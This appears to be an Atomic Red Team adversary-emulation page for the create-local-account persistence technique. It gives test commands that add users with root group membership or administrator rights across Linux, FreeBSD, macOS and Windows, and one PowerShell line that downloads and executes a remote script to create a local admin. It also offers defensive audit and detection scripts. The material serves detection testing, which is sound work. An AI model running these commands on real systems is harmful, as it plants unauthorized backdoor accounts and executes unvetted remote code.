Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windows `net user /add` command can be used to create a local account. On macOS systems the `dscl -create` command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `username`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Atomic Test #6 - Create a new user in Linux with `root` UID and GID.

Atomic Test #7 - Create a new user in FreeBSD with `root` GID.

Create a user via useradd

Supported Platforms: Linux

auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | evil_user |

Run with `bash`. Elevation required (e.g. root or admin).

```bash
useradd -M -N -r -s /bin/bash -c evil_account #{username}
```

Cleanup:

```bash
userdel #{username}
```

Create a user via pw

Supported Platforms: Linux

auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | evil_user |

Run with `sh`. Elevation required (e.g. root or admin).

```sh
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
```

Cleanup:

```sh
rmuser -y #{username}
```

Creates a user on a macOS system with dscl

Supported Platforms: macOS

auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | evil_user |
| realname | `realname` to record when creating the user | string | Evil Account |

Run with `bash`. Elevation required (e.g. root or admin).

```bash
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```

Cleanup:

```bash
dscl . -delete /Users/#{username}
```

Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run `net user` in PowerShell or CMD and observe that there is a new user named "T1136.001_CMD".

Supported Platforms: Windows

auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | T1136.001_CMD |
| password | Password of the user to create | string | T1136.001_CMD! |

Run with `command_prompt`. Elevation required (e.g. root or admin).

```cmd
net user /add "#{username}" "#{password}"
```

Cleanup:

```cmd
net user /del "#{username}" >nul 2>&1
```

Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the PowerShell session. To verify the new account, run `net user` in PowerShell or CMD and observe that there is a new user named "T1136.001_PowerShell".

Supported Platforms: Windows

auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | T1136.001_PowerShell |

Run with `powershell`. Elevation required (e.g. root or admin).

```powershell
New-LocalUser -Name "#{username}" -NoPassword
```

Cleanup:

```powershell
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```

Create a new user in Linux with `root` UID and GID.

Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.

Supported Platforms: Linux

auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |

Run with `bash`. Elevation required (e.g. root or admin).

```bash
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
```

Cleanup:

```bash
userdel #{username}
```

Create a new user in FreeBSD with `root` GID.

Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.

Supported Platforms: Linux

auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |

Run with `sh`. Elevation required (e.g. root or admin).

```sh
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
```

Cleanup:

```sh
pw userdel #{username}
```

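
A host-side check for what the Linux and FreeBSD tests above leave in the account database, as an added example that is not part of Atomic Red Team: it reads passwd-format lines and flags accounts missing from a known-good list, non-root accounts with UID 0, accounts with primary group 0 and a login shell, and system-range UIDs with a login shell. The function names, finding labels, the 1000 UID threshold and the sample lines are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not Atomic Red Team code. Reads passwd(5)-format lines on stdin
# and reports accounts that look like the ones the tests above create.
#   $1  whitespace-separated names of accounts already known to be legitimate
#   $2  first UID given to regular users (assumption: 1000 unless overridden)
audit_passwd() {
    awk -F: -v known="$1" -v uid_min="${2:-1000}" '
        BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
        /^[ \t]*(#|$)/ { next }                         # comments and blank lines
        NF != 7 || $3 !~ /^[0-9]+$/ || $4 !~ /^[0-9]+$/ { print $1 "\tMALFORMED"; next }
        {
            uid = $3 + 0; gid = $4 + 0; f = ""
            # An empty shell field means the system default shell, so it counts.
            login = ($7 == "" || $7 ~ /\/(ba|da|z|k|c|tc|fi)?sh$/)
            if (!($1 in ok))                            f = f ",NEW"
            if ($1 != "root" && uid == 0)               f = f ",UID0"
            if ($1 != "root" && gid == 0 && login)      f = f ",GID0_SHELL"
            if (uid > 0 && uid < uid_min + 0 && login)  f = f ",SYSTEM_SHELL"
            if (f != "") print $1 "\t" substr(f, 2)
        }'
}

# Constructed sample: stock entries plus the lines that the useradd test and
# the "butter" test would add with their default input values.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
alice:x:1000:1000:Alice:/home/alice:/bin/bash
evil_user:x:998:100:evil_account:/home/evil_user:/bin/bash
butter:x:1001:0::/root:/bin/bash
EOF
}

sample_passwd | audit_passwd "root daemon shutdown alice"
```

An account created with a `nologin` shell and an ordinary UID, as in the `pw` test, is reported only as `NEW`, so the known-account list is what catches it.
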
Creates a new admin user in a command prompt.

Supported Platforms: Windows

auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | string | T1136.001_Admin |
| password | Password of the user to create | string | T1136_pass |

Run with `command_prompt`. Elevation required (e.g. root or admin).

```cmd
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
```

Cleanup:

```cmd
net user /del "#{username}" >nul 2>&1
```

Creates a new admin user in a PowerShell session without using net.exe

Supported Platforms: Windows

auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f

Run with `powershell`. Elevation required (e.g. root or admin).

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
```
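
Most of the tests on this page run a recognisable account-creation command, so process-creation telemetry is one place to catch them. The following is an added example, not Atomic Red Team code, that tags command lines matching those commands; the input format (one command line per line), the tag names and the sample lines are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not Atomic Red Team code. Reads process command lines on stdin
# (one per line, as exported from process-creation logging) and prints
# "<tag><TAB><command line>" for those matching the commands used in the tests.
tag_account_creation() {
    awk '
        function hit(re) { return l ~ re }
        {
            # Normalise: lower-case, drop quotes, treat backslash and slash alike.
            l = tolower($0); gsub(/"/, "", l); gsub(/\\/, "/", l)
            tag = ""
            if      (hit("(^|[ /])pw +useradd "))                  tag = "freebsd-pw-useradd"
            else if (hit("(^|[ /])useradd "))                      tag = "linux-useradd"
            else if (hit("(^|[ /])dscl +[^ ]+ +-create +/users/")) tag = "macos-dscl-create"
            else if (hit("(^|[ /])net1?(\\.exe)? +localgroup +administrators .*/add")) tag = "windows-localgroup-admin"
            else if (hit("(^|[ /])net1?(\\.exe)? +user .*/add"))   tag = "windows-net-user-add"
            else if (hit("new-localuser "))                        tag = "windows-new-localuser"
            if (tag != "") print tag "\t" $0
        }'
}

# Constructed sample: the test commands with their default input values,
# one with an assumed full path to net.exe, plus two benign lines.
sample_cmdlines() {
    cat <<'EOF'
useradd -M -N -r -s /bin/bash -c evil_account evil_user
pw useradd evil_user -s /usr/sbin/nologin -d /nonexistent -c evil_account
dscl . -create /Users/evil_user UserShell /bin/zsh
C:\Windows\System32\net.exe user /add "T1136.001_CMD" "T1136.001_CMD!"
net localgroup administrators "T1136.001_Admin" /add
New-LocalUser -Name "T1136.001_PowerShell" -NoPassword
net user
userdel evil_user
EOF
}

sample_cmdlines | tag_account_creation
```

The last test creates its admin account without `net.exe`, so none of these patterns match it; Windows Security events 4720 (user account created) and 4732 (member added to a local group) record the result regardless of the tool used.
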